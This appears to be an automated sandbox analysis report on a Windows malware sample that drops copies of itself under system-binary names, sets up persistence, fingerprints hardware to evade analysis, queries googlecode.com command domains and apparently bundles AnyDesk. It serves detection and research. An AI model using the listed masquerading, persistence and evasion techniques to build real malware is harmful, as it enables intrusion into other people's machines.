                                Source: explorer.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: spoolsv.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: svchost.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Source: sJ9Q8UWMAX.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeFile deleted: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeCode function: 0_2_00412C100_2_00412C10
                                Source: sj9q8uwmax.exe .0.drStatic PE information: No import functions for PE file found
                                Source: sJ9Q8UWMAX.exe, 00000000.00000000.435360088.000000000041D000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs sJ9Q8UWMAX.exe
                                Source: sj9q8uwmax.exe .0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: tokenbinding.dllJump to behavior
                                Source: sJ9Q8UWMAX.exeVirustotal: Detection: 86%
                                Source: sJ9Q8UWMAX.exeMetadefender: Detection: 85%
                                Source: sJ9Q8UWMAX.exeReversingLabs: Detection: 100%
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile read: C:\Users\user\Desktop\sJ9Q8UWMAX.exeJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\svchost.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                                Source: C:\Windows\Resources\svchost.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                                Source: unknownProcess created: C:\Users\user\Desktop\sJ9Q8UWMAX.exe "C:\Users\user\Desktop\sJ9Q8UWMAX.exe"
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess created: C:\Users\user\Desktop\sj9q8uwmax.exe c:\users\user\desktop\sj9q8uwmax.exe
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exe
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process created: C:\Users\user\Desktop\sj9q8uwmax.exe "c:\users\user\desktop\sj9q8uwmax.exe " --local-service
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exe
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process created: C:\Users\user\Desktop\sj9q8uwmax.exe "c:\users\user\desktop\sj9q8uwmax.exe " --local-control
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SE
                                Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exe
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PR
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                                Source: unknownProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess created: C:\Users\user\Desktop\sj9q8uwmax.exe c:\users\user\desktop\sj9q8uwmax.exe Jump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess created: C:\Windows\Resources\Themes\icsys.icn.exe C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process created: C:\Users\user\Desktop\sj9q8uwmax.exe "c:\users\user\desktop\sj9q8uwmax.exe " --local-serviceJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process created: C:\Users\user\Desktop\sj9q8uwmax.exe "c:\users\user\desktop\sj9q8uwmax.exe " --local-controlJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exeJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SEJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exeJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PRJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2155fee3-2419-4373-b102-6843707eb41f}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: c:\users\user\desktop\sj9q8uwmax.exe Jump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Users\user\AppData\Local\Temp\~DFFE57A1C8066DBB5E.TMPJump to behavior
                                Source: classification engineClassification label: mal100.spre.evad.winEXE@22/19@15/7
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe File read: C:\Users\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeCode function: 0_2_00410180 __vbaChkstk,__vbaStrCopy,__vbaAryConstruct2,__vbaOnError,CreateToolhelp32Snapshot,__vbaSetSystemError,__vbaRecUniToAnsi,Process32First,__vbaSetSystemError,__vbaRecAnsiToUni,#525,__vbaStrMove,__vbaSetSystemError,__vbaGenerateBoundsError,__vbaStrToAnsi,K32GetModuleFileNameExA,__vbaSetSystemError,__vbaStrToUnicode,__vbaFreeStr,#616,__vbaStrMove,__vbaStrMove,__vbaFreeStr,__vbaLenBstr,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaInStr,__vbaFreeStrList,__vbaRecUniToAnsi,Process32Next,__vbaSetSystemError,__vbaRecAnsiToUni,FindCloseChangeNotification,__vbaFreeStr,__vbaAryDestruct,__vbaFreeStr,__vbaFreeStr,0_2_00410180
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Session\1\ad_connect_queue_7024_1677787656_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_6912_1582247049_0_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2884_1748695018_1_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_6912_1582247049_1_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_708_lsystem_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_mailbox_2884_1748695018_0_mtx
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ad_trace_mtx
                                Source: sJ9Q8UWMAX.exe, sJ9Q8UWMAX.exe, 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, sJ9Q8UWMAX.exe, 00000000.00000000.435290439.0000000000401000.00000080.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000002.00000002.490867469.0000000000402000.00000080.00000001.01000000.00000007.sdmp, icsys.icn.exe, 00000002.00000000.456086983.0000000000401000.00000080.00000001.01000000.00000007.sdmpBinary or memory string: A*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                Source: sJ9Q8UWMAX.exe, 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp, icsys.icn.exe, 00000002.00000002.490945123.000000000041B000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: flH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                                Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe File read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Window found: window name: SysTabControl32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: sJ9Q8UWMAX.exeStatic file information: File size 3987229 > 1048576
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-64\privacy_feature\privacy_feature.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_loader\AnyDesk.pdb source: sj9q8uwmax.exe , 00000001.00000002.745852702.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-32\win_dwm\win_dwm.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dwm-64\win_dwm\win_dwm.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\dda-32\privacy_feature\privacy_feature.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Buildbot\ad-windows-32\build\release\app-32\win_app\win_app.pdb@ source: sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdbR source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdb source: sj9q8uwmax.exe , 00000001.00000002.742694310.0000000000E99000.00000004.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp

                                Data Obfuscation

                                Source: C:\Windows\Resources\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32Jump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Unpacked PE file: 1.2.sj9q8uwmax.exe .3d0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Unpacked PE file: 3.2.sj9q8uwmax.exe .3d0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Unpacked PE file: 6.2.sj9q8uwmax.exe .3d0000.0.unpack .text:ER;.itext:W;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.itext:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                                Source: explorer.exe.2.drStatic PE information: real checksum: 0x4bf451a should be: 0x23da0
                                Source: sJ9Q8UWMAX.exeStatic PE information: real checksum: 0x4bf451a should be: 0x3d43a6
                                Source: icsys.icn.exe.0.drStatic PE information: real checksum: 0x4bf451a should be: 0x29178
                                Source: spoolsv.exe.5.drStatic PE information: real checksum: 0x4bf451a should be: 0x2ad27
                                Source: svchost.exe.8.drStatic PE information: real checksum: 0x4bf451a should be: 0x2902a

                                Persistence and Installation Behavior

                                Source: C:\Windows\Resources\Themes\icsys.icn.exeExecutable created and started: c:\windows\resources\themes\explorer.exeJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeExecutable created and started: c:\windows\resources\svchost.exeJump to behavior
                                Source: C:\Windows\Resources\svchost.exeExecutable created and started: c:\windows\resources\spoolsv.exeJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeExecutable created and started: C:\Windows\Resources\Themes\icsys.icn.exeJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeFile created: C:\Windows\Resources\Themes\explorer.exeJump to dropped file
                                Source: C:\Windows\Resources\Themes\explorer.exeFile created: C:\Windows\Resources\spoolsv.exeJump to dropped file
                                Source: C:\Windows\Resources\spoolsv.exeFile created: C:\Windows\Resources\svchost.exeJump to dropped file
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Users\user\Desktop\sj9q8uwmax.exe Jump to dropped file
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeFile created: C:\Windows\Resources\Themes\icsys.icn.exeJump to dropped file
                                Source: C:\Windows\Resources\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccessJump to behavior

                                Hooking and other Techniques for Hiding and Protection

                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe File opened: c:\users\user\desktop\sj9q8uwmax.exe :Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Registry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Process information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT MACAddress FROM Win32_NetworkAdapter WHERE PhysicalAdapter = TRUE
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 6996 Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 7004 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 6996 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 7020 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\Resources\Themes\explorer.exe TID: 7060 Thread sleep count: 417 > 30
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 5604 Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 4364 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 5176 Thread sleep time: -60000s >= -30000s
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 5740 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe TID: 5604 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\Resources\svchost.exe TID: 5868 Thread sleep count: 106 > 30
                                Source: C:\Windows\System32\svchost.exe TID: 4404 Thread sleep time: -30000s >= -30000s
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exe Window / User API: threadDelayed 940
                                Source: C:\Windows\Resources\Themes\explorer.exe Window / User API: threadDelayed 417
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exe API coverage: 8.7 %
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exe Code function: 0_2_00403A5C sgdt fword ptr [eax]
                                Source: C:\Users\user\Desktop\sJ9Q8UWMAX.exe Process information queried: ProcessInformation
                                Source: svchost.exe, 0000000A.00000002.715359302.0000018397E63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @Hyper-V RAW
                                Source: sj9q8uwmax.exe, 00000003.00000003.500025355.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe, 00000003.00000003.503811175.00000000038A3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Memory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\Resources\Themes\explorer.exe Domain query: codecmd02.googlecode.com
                                Source: C:\Windows\Resources\Themes\explorer.exe Network Connect: 142.250.102.82 80
                                Source: C:\Windows\Resources\Themes\explorer.exe Domain query: codecmd01.googlecode.com
                                Source: C:\Windows\Resources\Themes\explorer.exe Domain query: codecmd03.googlecode.com
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: C:\Users\user\Desktop\sj9q8uwmax.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: sj9q8uwmax.exe, 00000001.00000002.744571226.0000000000F3F000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: "release/win_7.0.x"
                                Source: sj9q8uwmax.exe, 00000001.00000002.745852702.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: .itext.text.custom"8ffad92693024ca1759b2f87913ca4d0""release/win_7.0.x""48815da1984dde46a0967eee042ece2e6a89546b"
                                Source: sj9q8uwmax.exe, 00000001.00000002.744571226.0000000000F3F000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: "48815da1984dde46a0967eee042ece2e6a89546b""release/win_7.0.x""8ffad92693024ca1759b2f87913ca4d0"
                                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                                Valid Accounts | 511 Windows Management Instrumentation | 1 Windows Service | 1 Windows Service | 231 Masquerading | 1 Input Capture | 1 Query Registry | Remote Services | 1 Input Capture | Exfiltration Over Other Network Medium | 12 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                                Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 421 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                                Domain Accounts | At (Linux) | Logon Script (Windows) | 1 DLL Side-Loading | 351 Virtualization/Sandbox Evasion | Security Account Manager | 351 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 11 Process Injection | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
